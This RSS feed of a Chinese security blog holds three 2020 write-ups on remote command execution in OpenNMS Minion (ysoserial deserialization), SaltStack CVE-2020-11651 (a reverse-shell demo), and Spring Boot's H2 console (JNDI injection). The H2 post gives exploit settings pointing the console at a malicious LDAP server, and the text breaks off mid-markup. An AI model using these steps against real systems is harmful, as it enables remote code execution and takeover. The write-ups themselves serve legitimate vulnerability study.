<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>攻防二象性</title>
    <link>https://wechat2rss.xlab.app/feed/f3ace422519a0db0d5848415f0ad2e36ecf2c069.xml</link>
    <description>Words are my own.&#xA;(wechat feed made by @ttttmr https://wechat2rss.xlab.app)</description>
    <managingEditor> (攻防二象性)</managingEditor>
    <image>
      <url>https://wx.qlogo.cn/mmhead/bVy2VQVTWzaGYjuicNm2K5iavzVbL3jcBcSaS7e98XjLs0vpclNg99MzE9tmfDiacpkA98JDic6quicY/0</url>
      <title>攻防二象性</title>
      <link>https://wechat2rss.xlab.app/feed/f3ace422519a0db0d5848415f0ad2e36ecf2c069.xml</link>
    </image>
    <item>
      <title>OpenNMS 远程命令执行</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI2NTM1MjQ3OA==&amp;mid=2247483683&amp;idx=1&amp;sn=6031e37ba729f19f5b5887d6a763a75d</link>
      <description>OpenNMS是一款企业级基于Java开发的分布式监控系统</description>
      <content:encoded><![CDATA[<p>
<span>pyn3rd</span> <span>2020-05-09 19:46</span> <span style="display: inline-block;"></span>
</p>

<p>OpenNMS是一款企业级基于Java开发的分布式监控系统</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=f89d49e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FEFsbR7ibibnA27NSjToMjqnrkxKiaXnqZyHwibDQFaEBPc2OpCFjrziaiahnicFA7wODwrTGDIBs1GgDKj7qWanQUxaBw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<ul class="list-paddingleft-2" style="list-style-type: disc;"><li><p style="text-align: left;"><span style="color: rgb(61, 70, 77);font-family: &#34;Pingfang SC&#34;, STHeiti, &#34;Lantinghei SC&#34;, &#34;Open Sans&#34;, Arial, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, &#34;WenQuanYi Micro Hei&#34;, SimSun, sans-serif;font-size: 16px;text-align: start;background-color: rgb(255, 255, 255);">OpenNMS是一款企业级基于Java开发的分布式监控系统，当安装OpenNMS客户Minion作为agent时，默认监听在TCP的61616端口</span></p></li></ul><p style="text-align: center;"><img class="rich_pages" data-ratio="0.4318766066838046" data-s="300,640" style="" data-type="png" data-w="778" src="https://wechat2rss.xlab.app/img-proxy/?k=85c9a2f4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEFsbR7ibibnA27NSjToMjqnrkxKiaXnqZyHZL1mq9fGrILfecIxl47uZ0rkrgTEZ5SwQ7s7nVyhSEBxdSZoaELjKw%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: left;"><span style="color: rgb(61, 70, 77);font-family: &#34;Pingfang SC&#34;, STHeiti, &#34;Lantinghei SC&#34;, &#34;Open Sans&#34;, Arial, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, &#34;WenQuanYi Micro Hei&#34;, SimSun, sans-serif;font-size: 16px;text-align: start;background-color: rgb(255, 255, 255);"></span><br/></p><ul class="list-paddingleft-2" style="list-style-type: disc;"><li><p style="text-align: left;">Minion默认使用了安全角色管理，同时需要用户名和密码进行鉴权通信<br/></p></li></ul><p style="text-align: center;"><img class="rich_pages" data-ratio="0.0509761388286334" data-s="300,640" style="" data-type="png" data-w="1844" src="https://wechat2rss.xlab.app/img-proxy/?k=c6e5487a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEFsbR7ibibnA27NSjToMjqnrkxKiaXnqZyHF6jn9ZDqh0YibN3YpvRyr52ibJiaAKDMV9zZGatiaiapMiaqkAORjP63Jq7g%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><ul class="list-paddingleft-2" style="list-style-type: disc;"><li><p>近期爆出一个基于Minion的Java反序列化远程命令执行漏洞<br/></p></li></ul><p style="text-align: center;"><img class="rich_pages" data-ratio="0.2865546218487395" data-s="300,640" style="" data-type="png" data-w="1190" src="https://wechat2rss.xlab.app/img-proxy/?k=2c158f69&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEFsbR7ibibnA27NSjToMjqnrkxKiaXnqZyHYOtjNaS6jnE6TKfuWLn8hrpwFCvnCeIGV0MRP6BxQbjoibx5QicABRBQ%2F640%3Fwx_fmt%3Dpng"/></p><ul class="list-paddingleft-2" style="list-style-type: disc;"><li><p>在知道Minion用户名和密码的情况下，可以<span style="color: rgb(0, 0, 0);">进行Java反序列化远程命令执行，这里使用的gadget是<span style="color: rgb(0, 82, 255);">CommonsBeanutils1</span></span><br/></p></li></ul><p style="text-align: center;"><img class="rich_pages" data-ratio="0.14149253731343284" data-s="300,640" style="" data-type="png" data-w="1675" src="https://wechat2rss.xlab.app/img-proxy/?k=ce3dab52&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEFsbR7ibibnA27NSjToMjqnrkxKiaXnqZyHVH2IWjykC0anBg0a56QAuibFeSSib3mL1mOyqiaEXveu8ftSia9CxbmS5A%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: left;"><br/></p><ul class="list-paddingleft-2" style="list-style-type: disc;"><li><p style="text-align: left;"><span style="text-align: left;">在目标机器上成功创</span><span style="text-align: left;">建文</span><span style="text-align: left;">件</span></p></li></ul><p style="text-align: left;"><img class="rich_pages" data-ratio="0.13740458015267176" data-s="300,640" style="" data-type="png" data-w="524" src="https://wechat2rss.xlab.app/img-proxy/?k=9a29797f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEFsbR7ibibnA27NSjToMjqnrkxKiaXnqZyHYOicH12SBUZam6DCES9Xg2rWbTTNabdx6cNEGAhqdAdicP59GaldBXDg%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: left;"><br/></p><ul class="list-paddingleft-2" style="list-style-type: disc;"><li><p style="text-align: left;">注意：这里需要确保ysoserial中commons-beanutils的jar包版本和安装Minion的目标机器中commons-beanutils的jar包<span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">版本一致(commons-beanutils-1.8.3.jar)，否则会因为</span><span style="color: rgb(0, 82, 255);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">serialVersionUID</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">不一致报错</span></p></li></ul><p style="text-align: left;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><br/></span></p><ul class="list-paddingleft-2" style="list-style-type: disc;"><li><p style="text-align: left;">演示在最后</p></li></ul><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.48086124401913877" data-s="300,640" style="" data-type="gif" data-w="1672" src="https://wechat2rss.xlab.app/img-proxy/?k=f81f47f5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FEFsbR7ibibnA27NSjToMjqnrkxKiaXnqZyHia5KaKDQZ03Ndib8aPVic42ZyNyGjXsicbfJQoyibf5SJvae4uuR7JIkEGg%2F640%3Fwx_fmt%3Dgif"/></p><p style="text-align: left;"><br/></p><p>
				</p><p>
			</p><p>
		</p>



<p><a href="2247483683">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=a5d910c2&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI2NTM1MjQ3OA%3D%3D%26mid%3D2247483683%26idx%3D1%26sn%3D6031e37ba729f19f5b5887d6a763a75d%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sat, 09 May 2020 19:46:00 +0800</pubDate>
    </item>
    <item>
      <title>CVE-2020-11651 SaltStack远程命令执行漏洞</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI2NTM1MjQ3OA==&amp;mid=2247483668&amp;idx=1&amp;sn=ba7242994ad2547421a283efd2be78d5</link>
      <description>SaltStack漏洞背景国外安全团队(F-Secure) 发现多了SaltStack漏洞，其中最严重的两个</description>
      <content:encoded><![CDATA[<p>
<span>pyn3rd</span> <span>2020-05-05 01:40</span> <span style="display: inline-block;"></span>
</p>

<p>SaltStack漏洞背景国外安全团队(F-Secure) 发现多了SaltStack漏洞，其中最严重的两个</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=96dee8e6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FEFsbR7ibibnA0XaEAQhdMx56ObAicMaKic9D03qsmXnN85VEicla1DE4lVc8Y01zVF1ps0DC4l6ibT4fCUz8dACWIfPQ%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: left;">SaltStack漏洞背景</p><p style="text-align: left;"><span style="font-size: 15px;">国外安全团队(<span style="font-size: 15px;font-family: FSecureSans, Arial, sans-serif;text-align: start;">F-Secure) 发现多了SaltStack漏洞，<span style="color: rgb(0, 0, 0);text-indent: 30px;">其中最严重的两个漏洞是</span></span></span></p><ul class="list-paddingleft-2" style="list-style-type: disc;"><li><p style="text-align: left;"><span style="font-size: 15px;"><span style="font-size: 15px;font-family: FSecureSans, Arial, sans-serif;text-align: start;"><span style="color: rgb(0, 0, 0);font-style: inherit;text-indent: 2em;font-family: FSecureSansHeadline, &#34;Arial Black&#34;, Arial, sans-serif;text-align: start;">CVE-2020-11651(身份认证绕过漏洞，导致远程命令执行)</span></span></span></p></li><li><p style="text-align: left;"><span style="font-size: 15px;"><span style="font-size: 15px;font-family: FSecureSans, Arial, sans-serif;text-align: start;"><span style="color: rgb(0, 0, 0);font-style: inherit;text-indent: 2em;font-family: FSecureSansHeadline, &#34;Arial Black&#34;, Arial, sans-serif;text-align: start;">CVE-2020-11652(目录穿越漏洞)</span></span></span></p></li></ul><p style="text-align: left;"><span style="font-size: 15px;"><span style="font-size: 15px;font-family: FSecureSans, Arial, sans-serif;text-align: start;">原文: </span><span style="font-size: 15px;font-family: inherit;font-style: inherit;text-align: justify;text-indent: 2em;"><a href="https://labs.f-secure.com/advisories/saltstack-authorization-bypass" target="_blank">https://labs.f-secure.com/advisories/saltstack-authorization-bypass</a></span></span></p><p style="text-align: left;"><br/></p><p style="text-align: left;">SaltStack简介</p><ul class="list-paddingleft-2" style="list-style-type: disc;"><li style="font-size: 15px;"><p style="text-align: left;"><span style="color: rgb(64, 64, 64);font-family: -apple-system, system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;, &#34;Segoe UI Symbol&#34;, &#34;Segoe UI&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, &#34;Helvetica Neue&#34;, Helvetica, Arial, sans-serif;text-align: start;background-color: rgb(255, 255, 255);font-size: 15px;">SaltStack是一款Python编写的开源自动化管理工具</span></p></li><li style="font-size: 15px;"><p style="text-align: left;"><span style="color: rgb(64, 64, 64);font-family: -apple-system, system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;, &#34;Segoe UI Symbol&#34;, &#34;Segoe UI&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, &#34;Helvetica Neue&#34;, Helvetica, Arial, sans-serif;text-align: start;background-color: rgb(255, 255, 255);font-size: 15px;">基于C/S架构的服务模式</span></p></li><li style="font-size: 15px;"><p style="text-align: left;"><span style="color: rgb(64, 64, 64);font-family: -apple-system, system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;, &#34;Segoe UI Symbol&#34;, &#34;Segoe UI&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, &#34;Helvetica Neue&#34;, Helvetica, Arial, sans-serif;text-align: start;background-color: rgb(255, 255, 255);font-size: 15px;">使用了ZeroMQ消息队列</span></p></li></ul><p style="text-align: left;"><br/></p><p>SaltStack三种运行模式</p><ul class="list-paddingleft-2" style="list-style-type: disc;"><li><p><span style="font-size: 15px;">Local<br/></span></p></li><li><p><span style="font-size: 15px;">Master/Minion<br/></span></p></li><li><p><span style="font-size: 15px;">Salt SSH</span></p></li></ul><p><br/></p><p><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">SaltStack原理(<span style="font-size: 15px;">Master/Minion)</span></span><br/></p><ul class="list-paddingleft-2" style="list-style-type: disc;"><li><p><span style="color: rgb(0, 0, 0);font-family: &#34;Helvetica Neue&#34;, Helvetica, Verdana, Arial, sans-serif;text-align: left;font-size: 15px;"><code>Salt</code></span><span style="font-size: 15px;color: rgb(0, 0, 0);font-family: &#34;Helvetica Neue&#34;, Helvetica, Verdana, Arial, sans-serif;text-align: left;">使用<code>server-agent</code>通信模型，服务端组件被称为<code>Salt Master</code>，</span><span style="font-size: 15px;color: rgb(0, 0, 0);font-family: &#34;Helvetica Neue&#34;, Helvetica, Verdana, Arial, sans-serif;text-align: left;"><code>Agent</code></span><span style="font-size: 15px;color: rgb(0, 0, 0);font-family: &#34;Helvetica Neue&#34;, Helvetica, Verdana, Arial, sans-serif;text-align: left;">被称为<code>Salt Minion</code></span></p></li><li><p><span style="color: rgb(0, 0, 0);font-family: &#34;Helvetica Neue&#34;, Helvetica, Verdana, Arial, sans-serif;text-align: left;font-size: 15px;"><code>Salt Master</code></span><span style="font-size: 15px;color: rgb(0, 0, 0);font-family: &#34;Helvetica Neue&#34;, Helvetica, Verdana, Arial, sans-serif;text-align: left;">主要负责向<code>Salt Minions</code>发送命令，然后聚合并显示这些命令的结果。一个<code>Salt Master</code>可以管理多个</span><span style="font-size: 15px;color: rgb(0, 0, 0);font-family: &#34;Helvetica Neue&#34;, Helvetica, Verdana, Arial, sans-serif;text-align: left;"><code>Minion</code></span></p></li><li><p><span style="font-size: 15px;color: rgb(0, 0, 0);font-family: &#34;Helvetica Neue&#34;, Helvetica, Verdana, Arial, sans-serif;text-align: left;"><code>Salt Master</code>与<code>Salt Minion</code>通信的连接由<code>Salt Minion</code>发起，这也意味着<code>Salt Minion</code>上不需要开放任何传入端口（从而减少攻击）。<code>Salt Master</code>使用端口<code>4505</code>和<code>4506</code>，必须监听端口才能接收到访问连接</span></p></li></ul><p><span style="color: rgb(0, 0, 0);font-family: &#34;Helvetica Neue&#34;, Helvetica, Verdana, Arial, sans-serif;font-size: 14px;text-align: left;"><br/></span></p><ul class="list-paddingleft-2" style="list-style-type: circle;"><li><p><span style="font-size: 15px;"><strong>Publisher</strong> (端口4505)所有</span><code><span style="font-size: 15px;">Salt Minions</span></code><span style="font-size: 15px;">都需要建立一个持续连接到他们收听消息的发布者端口。命令是通过此端口异步发送给所有连接，这使命令可以在大量系统上同时执行</span></p></li><li><p><span style="font-size: 15px;"><strong>Request Server</strong> (端口4506) </span><code><span style="font-size: 15px;">Salt Minions</span></code><span style="font-size: 15px;">根据需要连接到请求服务器，将结果发送给</span><code><span style="font-size: 15px;">Salt Master</span></code><span style="font-size: 15px;">，并安全地获取请求的文件或特定</span><code><span style="font-size: 15px;">Minion</span></code><span style="font-size: 15px;">相关的数据值（称为</span><code><span style="font-size: 15px;">Salt pillar</span></code><span style="font-size: 15px;">）。连接到这个端口的连接在</span><code><span style="font-size: 15px;">Salt Master</span></code><span style="font-size: 15px;">和</span><code><span style="font-size: 15px;">Salt Minion</span></code><span style="font-size: 15px;">之间是1:1（不是异步）</span></p></li></ul><p><br/></p><p style="text-align: center;"><img class="rich_pages" data-ratio="0.8336192109777015" data-s="300,640" style="width: 547px;height: 456px;" data-type="png" data-w="1166" src="https://wechat2rss.xlab.app/img-proxy/?k=babbcc52&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEFsbR7ibibnA0XaEAQhdMx56ObAicMaKic9DOqfe7YbtjiahVpQtzhxdl4pjISpJqsd9efUPe8HAdKalx6WPpMibaXpQ%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p><span style="color: rgb(0, 0, 0);font-family: &#34;Helvetica Neue&#34;, Helvetica, Verdana, Arial, sans-serif;text-align: left;background-color: rgb(255, 255, 255);font-size: 17px;">SaltStack认证方式</span></p><p style="margin: 10px auto;color: rgb(0, 0, 0);font-family: &#34;Helvetica Neue&#34;, Helvetica, Verdana, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);"><code><span style="font-size: 15px;">Salt</span></code><span style="font-size: 15px;">的数据传输是通过</span><code><span style="font-size: 15px;">AES</span></code><span style="font-size: 15px;">加密，</span><code><span style="font-size: 15px;">Master</span></code><span style="font-size: 15px;">和</span><code><span style="font-size: 15px;">Minion</span></code><span style="font-size: 15px;">之前在通信之前，需要进行认证，</span><code><span style="font-size: 15px;">Salt</span></code><span style="font-size: 15px;">通过认证的方式保证安全性，完成一次认证后，<span style="font-size: 15px;font-family: &#34;Courier New&#34;;white-space: pre-wrap;"><span style="font-family: monospace;">Master</span>就可以控制</span><span style="font-size: 15px;font-family: monospace;">Minion</span>来完成各项工作了。</span></p><ul class="list-paddingleft-2" style="list-style-type: disc;"><li><p style="margin: 10px auto;color: rgb(0, 0, 0);font-family: &#34;Helvetica Neue&#34;, Helvetica, Verdana, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);"><span style="font-size: 15px;"><code><span style="color: rgb(0, 0, 0);font-family: monospace;font-size: 15px;text-align: left;background-color: rgb(255, 255, 255);">Minion</span></code>在第一次启动时，会在<code>/etc/salt/pki/minion/</code>下自动生成 <code>minion.pem(private key)</code>和 <code>minion.pub(public key)</code>, 然后将 <code>minion.pub</code> 发送</span><span style="font-size: 15px;"><code>给Master</code></span></p></li><li><p style="margin: 10px auto;color: rgb(0, 0, 0);font-family: &#34;Helvetica Neue&#34;, Helvetica, Verdana, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);"><span style="font-size: 15px;"><code>M</code></span><span style="font-size: 15px;"><code>aster</code>在第一次启动时，会在<code>/etc/salt/pki/master/</code>下自动生成<code>master.pem</code>和<code>master.pub，</code>并且会接收到<span style="color: rgb(0, 0, 0);font-family: monospace;font-size: 15px;text-align: left;background-color: rgb(255, 255, 255);">Minion</span>的<code>public key</code>,通过<code>salt-key</code>命令接收<span style="color: rgb(0, 0, 0);font-family: monospace;font-size: 15px;text-align: left;background-color: rgb(255, 255, 255);">Minion</span><code> public key，</code>会在</span><span style="font-size: 15px;"><code>Master</code></span><span style="font-size: 15px;">的<code>/etc/salt/pki/master/minions/</code>目录下存放以<span style="color: rgb(0, 0, 0);font-family: monospace;font-size: 15px;text-align: left;background-color: rgb(255, 255, 255);">Minion</span><code> id</code> 命令的<code>public key</code>，验证成功后同时<span style="color: rgb(0, 0, 0);font-family: monospace;font-size: 15px;text-align: left;background-color: rgb(255, 255, 255);">Minion</span>会保存一份</span><span style="color: rgb(0, 0, 0);font-family: monospace;font-size: 15px;text-align: left;background-color: rgb(255, 255, 255);">Master</span><span style="font-size: 15px;"> <code>public key</code>在<span style="color: rgb(0, 0, 0);font-family: monospace;font-size: 15px;text-align: left;background-color: rgb(255, 255, 255);">Minion</span>的<code>/etc/salt/pki/minion/minion_master.pub</code>里</span></p></li></ul><p style="margin: 10px auto;color: rgb(0, 0, 0);font-family: &#34;Helvetica Neue&#34;, Helvetica, Verdana, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);"><br/></p><p style="margin: 10px auto;color: rgb(0, 0, 0);font-family: &#34;Helvetica Neue&#34;, Helvetica, Verdana, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);"><span style="font-size: 17px;">Salt认证原理总结</span></p><pre style="white-space: pre-wrap;overflow-wrap: break-word;font-size: 12px;color: rgb(0, 0, 0);text-align: left;font-family: &#34;Courier New&#34; !important;"><ul class="list-paddingleft-2" style="list-style-type: disc;"><li><p><span style="font-size: 15px;line-height: 1.5 !important;"><span style="color: rgb(0, 0, 0);font-family: &#34;Helvetica Neue&#34;, Helvetica, Verdana, Arial, sans-serif;font-size: 15px;text-align: left;background-color: rgb(255, 255, 255);"><span style="color: rgb(0, 0, 0);font-family: monospace;font-size: 15px;text-align: left;background-color: rgb(255, 255, 255);">Minion</span></span>将自己的公钥发送给<span style="color: rgb(0, 0, 0);font-family: &#34;Helvetica Neue&#34;, Helvetica, Verdana, Arial, sans-serif;font-size: 15px;text-align: left;background-color: rgb(255, 255, 255);"></span><span style="color: rgb(0, 0, 0);font-family: monospace;font-size: 15px;text-align: left;background-color: rgb(255, 255, 255);">Master</span><code style="color: rgb(0, 0, 0);font-size: 15px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);"></code><br/></span></p></li><li><pre style="white-space: pre-wrap;overflow-wrap: break-word;font-size: 12px;color: rgb(0, 0, 0);text-align: left;font-family: &#34;Courier New&#34; !important;"><span style="font-size: 15px;"><span style="font-size: 15px;color: rgb(0, 0, 0);font-family: monospace;text-align: left;background-color: rgb(255, 255, 255);">Master</span>认证后再将自己的公钥也发送</span><span style="font-size: 15px;">给Minion</span></pre></li></ul></pre><pre style="white-space: pre-wrap;overflow-wrap: break-word;font-size: 12px;color: rgb(0, 0, 0);text-align: left;font-family: &#34;Courier New&#34; !important;"><br/></pre><p><span style="color: rgb(0, 0, 0);font-family: &#34;Helvetica Neue&#34;, Helvetica, Verdana, Arial, sans-serif;font-size: 14px;text-align: left;background-color: rgb(255, 255, 255);"><br/></span></p><p style="text-align: center;"><img class="rich_pages" data-ratio="0.9125560538116592" data-s="300,640" style="" data-type="png" data-w="892" src="https://wechat2rss.xlab.app/img-proxy/?k=223095c0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEFsbR7ibibnA0XaEAQhdMx56ObAicMaKic9DctvB1tSE5QnibwMdrR7HBic5JtzbmUb9Vg5D0paGrhEkQsTPwwibrE3kA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="color: rgb(0, 0, 0);font-family: &#34;Helvetica Neue&#34;, Helvetica, Verdana, Arial, sans-serif;text-align: left;background-color: rgb(255, 255, 255);">SaltStack远程命令执行漏洞演示</span></p><ul class="list-paddingleft-2" style="list-style-type: disc;"><li><p><span style="color: rgb(0, 0, 0);font-family: &#34;Helvetica Neue&#34;, Helvetica, Verdana, Arial, sans-serif;font-size: 14px;text-align: left;background-color: rgb(255, 255, 255);">漏洞出现在<span style="font-size: 15px;">Master/Minion</span>运行模式下，直接反弹shell获取其中一个Minion的系统权限</span><br/></p></li></ul><p style="text-align: center;"><img class="rich_pages" data-ratio="0.5568982880161127" data-s="300,640" style="" data-type="png" data-w="1986" src="https://wechat2rss.xlab.app/img-proxy/?k=cc036f16&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEFsbR7ibibnA0XaEAQhdMx56ObAicMaKic9DCRzHicMAUoNZo3cCxgsY0B29BNQ3KQ4DicJ2uIu1NJ7hF4WvPyKYlkzQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="color: rgb(0, 0, 0);font-family: &#34;Helvetica Neue&#34;, Helvetica, Verdana, Arial, sans-serif;font-size: 14px;text-align: left;background-color: rgb(255, 255, 255);"></span><br/></p>



<p><a href="2247483668">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=884f1505&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI2NTM1MjQ3OA%3D%3D%26mid%3D2247483668%26idx%3D1%26sn%3Dba7242994ad2547421a283efd2be78d5%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 05 May 2020 01:40:00 +0800</pubDate>
    </item>
    <item>
      <title>Spring Boot + H2数据库JNDI注入</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI2NTM1MjQ3OA==&amp;mid=2247483658&amp;idx=1&amp;sn=584710da0fbe56c1246755147bcec48e</link>
      <description>Spring Boot + H2数据库JNDI注入</description>
      <content:encoded><![CDATA[<p>
<span>pyn3rd</span> <span>2020-04-29 14:39</span> <span style="display: inline-block;"></span>
</p>

<p>Spring Boot + H2数据库JNDI注入</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=13975d0f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FEFsbR7ibibnA0HicxYpnbGf0ajiaJ1Lwk6PAZR5CPKsFR2LuvFAxpIrK3ncNDCWWHAiaial8cS3eeaoUXutOdoP5z1Pg%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<ul class="list-paddingleft-2" style="list-style-type: disc;"><li><p>在Spring Boot中使用 H2数据库，pom.xml引入依赖</p></li></ul><pre style="white-space: pre-wrap;text-align: start;background-color: rgb(43, 43, 43);color: rgb(169, 183, 198);font-family: Menlo;font-size: 12px;"><span style="border-width: 0px;border-style: initial;border-color: initial;outline: 0px;color: rgb(232, 191, 106);">dependency&gt;<br/>    &lt;groupId&gt;</span>org.springframework.boot<span style="border-width: 0px;border-style: initial;border-color: initial;outline: 0px;color: rgb(232, 191, 106);">&lt;/groupId&gt;<br/>    &lt;artifactId&gt;</span>spring-boot-starter-data-jpa<span style="border-width: 0px;border-style: initial;border-color: initial;outline: 0px;color: rgb(232, 191, 106);">&lt;/artifactId&gt;<br/>    &lt;version&gt;</span>2.2.6.RELEASE<span style="border-width: 0px;border-style: initial;border-color: initial;outline: 0px;color: rgb(232, 191, 106);">&lt;/version&gt;<br/>&lt;/dependency&gt;<br/>&lt;dependency&gt;<br/>    &lt;groupId&gt;</span>com.h2database<span style="border-width: 0px;border-style: initial;border-color: initial;outline: 0px;color: rgb(232, 191, 106);">&lt;/groupId&gt;<br/>    &lt;artifactId&gt;</span>h2<span style="border-width: 0px;border-style: initial;border-color: initial;outline: 0px;color: rgb(232, 191, 106);">&lt;/artifactId&gt;<br/>    &lt;scope&gt;</span>runtime<span style="border-width: 0px;border-style: initial;border-color: initial;outline: 0px;color: rgb(232, 191, 106);">&lt;/scope&gt;<br/>    &lt;version&gt;</span>1.4.199<span style="border-width: 0px;border-style: initial;border-color: initial;outline: 0px;color: rgb(232, 191, 106);">&lt;/version&gt;<br/>&lt;/dependency&gt;</span></pre><p><br/></p><ul class="list-paddingleft-2" style="list-style-type: disc;"><li><p>默认情况下<span style="color: rgb(0, 128, 255);">application.properties</span>文件中不存在以下配置</p></li></ul><pre style="background-color: rgb(43, 43, 43);color: rgb(169, 183, 198);font-family: Menlo;font-size: 9pt;"><span style="color:#cc7832;">   spring.h2.console.enabled</span><span style="color:#808080;">=</span><span style="color:#cc7832;">true</span></pre><p><br/></p><ul class="list-paddingleft-2" style="list-style-type: disc;"><li><p>直接访问抛出异常</p></li></ul><p style="text-align: center;"><img class="rich_pages" data-ratio="0.30687830687830686" data-s="300,640" style="" data-type="png" data-w="756" src="https://wechat2rss.xlab.app/img-proxy/?k=ae435979&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEFsbR7ibibnA0HicxYpnbGf0ajiaJ1Lwk6PAcuic5lQgW7tSNico25ypia3esUTGIzoCQ0quoGQPNUxzJsDYcIFv6UdQQ%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><ul class="list-paddingleft-2" style="list-style-type: disc;"><li><p>如果存在以上配置，可以直接访问 <span style="color: rgb(0, 128, 255);"><a href="http://127.0.0.1:8080/h2-console" target="_blank">http://127.0.0.1:8080/h2-console</a></span></p></li></ul><p style="text-align: center;"><img class="rich_pages" data-ratio="0.5050167224080268" data-s="300,640" style="" data-type="png" data-w="897" src="https://wechat2rss.xlab.app/img-proxy/?k=7d782da0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEFsbR7ibibnA0HicxYpnbGf0ajiaJ1Lwk6PA4OdGy3PkUS75CRNQlwHwOuGZYIibiapPR35QN5wnYNoLalI5niaqPjTaQ%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p><span style="font-size: 15px;"><span style="color: rgb(255, 0, 0);">注意：</span>这里的配置可以自定义</span></p><ul class="list-paddingleft-2" style="list-style-type: circle;"><li><p><span style="font-size: 15px;">Setting Name: Generic JNDI Data Source （名称随意）</span></p></li><li><p style="text-align: left;"><span style="font-size: 15px;">Driver Class: javax.naming.InitialContext （JDK自带也不用考虑额外的驱动）</span></p></li><li><p style="text-align: left;"><span style="font-size: 15px;">JDBC URL: ldap://127.0.0.1:1389/bwvyqg （恶意LDAP Server）</span></p></li><li><p><span style="font-size: 15px;">由于是匿名的，User Name和Password均为空</span></p><p><span style="font-size: 15px;"></span></p></li></ul><ul class="list-paddingleft-2" style="list-style-type: 